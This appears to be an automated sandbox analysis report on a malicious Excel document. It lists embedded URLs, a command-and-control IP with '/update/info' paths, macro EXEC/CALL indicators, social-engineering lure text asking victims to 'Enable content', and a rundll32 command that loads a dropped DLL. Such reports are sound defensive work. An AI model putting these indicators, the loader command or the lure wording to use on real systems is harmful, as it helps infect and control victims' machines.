Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://%s/%s/%sendcahttps://%s.pinrules.crt/%sRetrieveValidatestaple:OcspGetOcspPostOcspFailoverExp
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/U
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/gO~
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/hOg
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/qOh
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/update/info
Source: rundll32.exe, 00000001.00000003.801717651.00000000030BE000.00000004.00000001.sdmpString found in binary or memory: https://18.222.240.99/update/infoy
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/versal
Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: https://HTTP/1.1
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://eca.hinet.net/repository0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://repository.luxtrust.lu0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 104.21.64.132:443 -> 192.168.2.4:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.222.240.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.163.9.216:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet 13 ' k 14 0 Protected
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Documents_111651917_375818984.xlsInitial sample: EXEC
Source: Documents_111651917_375818984.xlsInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: Documents_111651917_375818984.xlsInitial sample: Sheet size: 4672
Office process drops PE fileShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dllJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\bsdnbsej.dbwJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67328FD4 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67329272 CreateProcessA,NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732353B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732F5B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67331580
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6733A4E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67387C26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6738B44E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6739798C
Source: Documents_111651917_375818984.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
Source: Joe Sandbox ViewDropped File: C:\Users\user\bsdnbsej.dbw 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6732ACF0 appears 34 times
Source: Documents_111651917_375818984.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: classification engineClassification label: mal100.expl.evad.winXLS@5/13@1/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\29779F63.emfJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{4e207749-963e-4384-8e88-b716f4ea4ff2}
Source: C:\Windows\SysWOW64\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\{809d51db-050d-477f-a665-11706e16a8a0}
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{006DB4C5-B21C-4B55-8F31-0A3839BFD91D} - OProcSessId.datJump to behavior
Source: Documents_111651917_375818984.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: dnsapi.pdbUGP source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: wininet.pdb source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source: Binary string: bcrypt.pdb source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: msi.pdbUGP source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: ole32.pdbUGP source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr
Source: Binary string: ole32.pdb source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: msi.pdb source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdbUGP source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: Binary string: bcrypt.pdbGCTL source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: netapi32.pdb source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbUGP source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: netapi32.pdbUGP source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: wininet.pdbUGP source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: shell32.pdbUGP source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdb source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6733AC21 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6734D7A9 push esi; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673896ED push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6734C6D1 push cs; retn 0000h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6734EEC4 push es; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6734CAEC push ebx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6734E143 push ecx; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673A069F push dword ptr [edi]; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673A2992 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673A1CCC push edx; iretd
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dllJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\bsdnbsej.dbwJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\bsdnbsej.dbwJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\bsdnbsej.dbwJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\bsdnbsej.dbwJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
